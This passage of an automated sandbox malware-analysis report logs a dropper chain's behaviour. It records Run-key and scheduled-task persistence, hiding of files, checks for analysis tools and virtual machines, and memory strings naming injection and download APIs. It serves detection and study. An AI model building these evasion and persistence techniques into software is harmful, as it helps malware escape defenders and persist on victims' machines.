Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	Window searched: window name: Regmonclass

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 602c785fe5.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 602c785fe5.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d8d3046b98.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d8d3046b98.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9774053d4c.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9774053d4c.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Graph	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Graph	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Registry value created or modified: HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run Graph	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Registry value created or modified: HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run Graph	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Services
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Services

Hooking and other Techniques for Hiding and Protection

Changes the view of files in windows explorer (hidden files and folders)

Source: C:\Windows\System32\audiodg.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden

Source: C:\Program Files\Windows Media Player\graph\graph.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\Desktop\file.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess			graph_0-9810
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess			graph_2-9745

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: svchost.exe, 0000001A.00000002.2297417537.00007FF7DF225000.00000002.00000400.00020000.00000000.sdmp	Binary or memory string: ZEROX64MADE IN ALGERIA <3REFLECTIVELOADERSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNGQGWZDSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\RUNSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\STARTUPFOLDER.EXELOADLIBRARYAKERNEL32.DLLGETPROCADDRESSKERNEL32.DLLWCSCPYMSVCRT.DLLWCSCATMSVCRT.DLLWCSCMPMSVCRT.DLLWCSNCPYMSVCRT.DLLWCSLENMSVCRT.DLLSTRLENMSVCRT.DLLREALLOCMSVCRT.DLLFREEMSVCRT.DLLWCSSTRMSVCRT.DLLGETWINDOWSDIRECTORYWKERNEL32.DLLGETVOLUMEINFORMATIONWKERNEL32.DLLLSTRCATWKERNEL32.DLLSETFILEATTRIBUTESWKERNEL32.DLLCLOSEHANDLEKERNEL32.DLLGETVERSIONEXAKERNEL32.DLLDELETEFILEWKERNEL32.DLLCREATEDIRECTORYAKERNEL32.DLLGETFILEATTRIBUTESAKERNEL32.DLLGETMODULEFILENAMEAKERNEL32.DLLCOPYFILEAKERNEL32.DLLGETWINDOWSDIRECTORYAKERNEL32.DLLCREATEFILEAKERNEL32.DLLHEAPALLOCKERNEL32.DLLGETPROCESSHEAPKERNEL32.DLLEXPANDENVIRONMENTSTRINGSWKERNEL32.DLLRESUMETHREADKERNEL32.DLLSETTHREADCONTEXTKERNEL32.DLLRTLCOMPAREMEMORYKERNEL32.DLLVIRTUALALLOCEXKERNEL32.DLLGETMODULEHANDLEAKERNEL32.DLLGETTHREADCONTEXTKERNEL32.DLLGETMODULEFILENAMEWKERNEL32.DLLVIRTUALPROTECTEXKERNEL32.DLLGETLASTERRORKERNEL32.DLLRELEASEMUTEXKERNEL32.DLLCREATEMUTEXAKERNEL32.DLLHEAPFREEKERNEL32.DLLWAITFORSINGLEOBJECTKERNEL32.DLLCREATETHREADKERNEL32.DLLCHECKREMOTEDEBUGGERPRESENTKERNEL32.DLLGETCURRENTPROCESSKERNEL32.DLLISDEBUGGERPRESENTKERNEL32.DLLEXITPROCESSKERNEL32.DLLDELETEFILEAKERNEL32.DLLPROCESS32NEXTWKERNEL32.DLLTERMINATEPROCESSKERNEL32.DLLOPENPROCESSKERNEL32.DLLPROCESS32FIRSTWKERNEL32.DLLCREATETOOLHELP32SNAPSHOTKERNEL32.DLLSETENDOFFILEKERNEL32.DLLLSTRCMPAKERNEL32.DLLWRITEPROCESSMEMORYKERNEL32.DLLREADPROCESSMEMORYKERNEL32.DLLGETFILESIZEKERNEL32.DLLWRITEFILEKERNEL32.DLLADJUSTTOKENPRIVILEGESADVAPI32.DLLOPENPROCESSTOKENADVAPI32.DLLLOOKUPPRIVILEGEVALUEWADVAPI32.DLLGETTOKENINFORMATIONADVAPI32.DLLCREATEFILEWKERNEL32.DLLSHGETFOLDERPATHWSHELL32.DLLSHGETFOLDERPATHASHELL32.DLLLSTRCATAKERNEL32.DLLSETFILEATTRIBUTESAKERNEL32.DLLSHGETKNOWNFOLDERPATHSHELL32.DLLFREELIBRARYKERNEL32.DLLMOVEFILEWKERNEL32.DLLGETFILESIZEEXKERNEL32.DLLGETWINDOWSDIRECTORYAKERNEL32.DLLGETVOLUMEINFORMATIONAKERNEL32.DLLGETTICKCOUNTKERNEL32.DLLWSPRINTFWUSER32.DLLWSPRINTFAUSER32.DLLVIRTUALALLOCKERNEL32.DLLREADFILEKERNEL32.DLLSLEEPKERNEL32.DLLVIRTUALFREEKERNEL32.DLLSETFILEPOINTERKERNEL32.DLLCREATEDIRECTORYWKERNEL32.DLLFINDFIRSTFILEWKERNEL32.DLLFINDNEXTFILEWKERNEL32.DLLFINDCLOSEKERNEL32.DLLCOPYFILEWKERNEL32.DLLWRITEFILEKERNEL32.DLLGETSYSTEMDIRECTORYWKERNEL32.DLLEXITPROCESSKERNEL32.DLLCREATEREMOTETHREADKERNEL32.DLLINTERNETOPENURLWWININET.DLLINTERNETREADFILEWININET.DLLHTTPQUERYINFOAWININET.DLLINTERNETOPENWWININET.DLLINTERNETCONNECTWWININET.DLLHTTPOPENREQUESTWWININET.DLLHTTPSENDREQUESTAWININET.DLLINTERNETCLOSEHANDLEWININET.DLLPATHISURLWSHLWAPI.DLLPATHCOMBINEWSHLWAPI.DLLPATHFINDFILENAMEWSHLWAPI.DLLSTRSTRASHLWAPI.DLLURLDOWNLOADTOFILEWURLMON.DLLCREATEPROCESSWKERNEL32.DLLSHELLEXECUTEWSHELL32.DLLGETMODULEFILENAMEWKERNEL32.DLLGETSHORTPATHNAMEWKERNEL32.DLLGETENVIRONMENTVARIABLEWKERNEL32.DLLREGOPENKEYEXWADVAPI32.DLLREGSETVALUEEXW
Source: 2DB3A69DE7692371543510.exe, 00000017.00000003.2296160005.0000000000A40000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: HZEROX64MADE IN ALGERIA <3REFLECTIVELOADERSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNGQGWZDSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\RUNSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\STARTUPFOLDER.EXELOADLIBRARYAKERNEL32.DLLGETPROCADDRESSKERNEL32.DLLWCSCPYMSVCRT.DLLWCSCATMSVCRT.DLLWCSCMPMSVCRT.DLLWCSNCPYMSVCRT.DLLWCSLENMSVCRT.DLLSTRLENMSVCRT.DLLREALLOCMSVCRT.DLLFREEMSVCRT.DLLWCSSTRMSVCRT.DLLGETWINDOWSDIRECTORYWKERNEL32.DLLGETVOLUMEINFORMATIONWKERNEL32.DLLLSTRCATWKERNEL32.DLLSETFILEATTRIBUTESWKERNEL32.DLLCLOSEHANDLEKERNEL32.DLLGETVERSIONEXAKERNEL32.DLLDELETEFILEWKERNEL32.DLLCREATEDIRECTORYAKERNEL32.DLLGETFILEATTRIBUTESAKERNEL32.DLLGETMODULEFILENAMEAKERNEL32.DLLCOPYFILEAKERNEL32.DLLGETWINDOWSDIRECTORYAKERNEL32.DLLCREATEFILEAKERNEL32.DLLHEAPALLOCKERNEL32.DLLGETPROCESSHEAPKERNEL32.DLLEXPANDENVIRONMENTSTRINGSWKERNEL32.DLLRESUMETHREADKERNEL32.DLLSETTHREADCONTEXTKERNEL32.DLLRTLCOMPAREMEMORYKERNEL32.DLLVIRTUALALLOCEXKERNEL32.DLLGETMODULEHANDLEAKERNEL32.DLLGETTHREADCONTEXTKERNEL32.DLLGETMODULEFILENAMEWKERNEL32.DLLVIRTUALPROTECTEXKERNEL32.DLLGETLASTERRORKERNEL32.DLLRELEASEMUTEXKERNEL32.DLLCREATEMUTEXAKERNEL32.DLLHEAPFREEKERNEL32.DLLWAITFORSINGLEOBJECTKERNEL32.DLLCREATETHREADKERNEL32.DLLCHECKREMOTEDEBUGGERPRESENTKERNEL32.DLLGETCURRENTPROCESSKERNEL32.DLLISDEBUGGERPRESENTKERNEL32.DLLEXITPROCESSKERNEL32.DLLDELETEFILEAKERNEL32.DLLPROCESS32NEXTWKERNEL32.DLLTERMINATEPROCESSKERNEL32.DLLOPENPROCESSKERNEL32.DLLPROCESS32FIRSTWKERNEL32.DLLCREATETOOLHELP32SNAPSHOTKERNEL32.DLLSETENDOFFILEKERNEL32.DLLLSTRCMPAKERNEL32.DLLWRITEPROCESSMEMORYKERNEL32.DLLREADPROCESSMEMORYKERNEL32.DLLGETFILESIZEKERNEL32.DLLWRITEFILEKERNEL32.DLLADJUSTTOKENPRIVILEGESADVAPI32.DLLOPENPROCESSTOKENADVAPI32.DLLLOOKUPPRIVILEGEVALUEWADVAPI32.DLLGETTOKENINFORMATIONADVAPI32.DLLCREATEFILEWKERNEL32.DLLSHGETFOLDERPATHWSHELL32.DLLSHGETFOLDERPATHASHELL32.DLLLSTRCATAKERNEL32.DLLSETFILEATTRIBUTESAKERNEL32.DLLSHGETKNOWNFOLDERPATHSHELL32.DLLFREELIBRARYKERNEL32.DLLMOVEFILEWKERNEL32.DLLGETFILESIZEEXKERNEL32.DLLGETWINDOWSDIRECTORYAKERNEL32.DLLGETVOLUMEINFORMATIONAKERNEL32.DLLGETTICKCOUNTKERNEL32.DLLWSPRINTFWUSER32.DLLWSPRINTFAUSER32.DLLVIRTUALALLOCKERNEL32.DLLREADFILEKERNEL32.DLLSLEEPKERNEL32.DLLVIRTUALFREEKERNEL32.DLLSETFILEPOINTERKERNEL32.DLLCREATEDIRECTORYWKERNEL32.DLLFINDFIRSTFILEWKERNEL32.DLLFINDNEXTFILEWKERNEL32.DLLFINDCLOSEKERNEL32.DLLCOPYFILEWKERNEL32.DLLWRITEFILEKERNEL32.DLLGETSYSTEMDIRECTORYWKERNEL32.DLLEXITPROCESSKERNEL32.DLLCREATEREM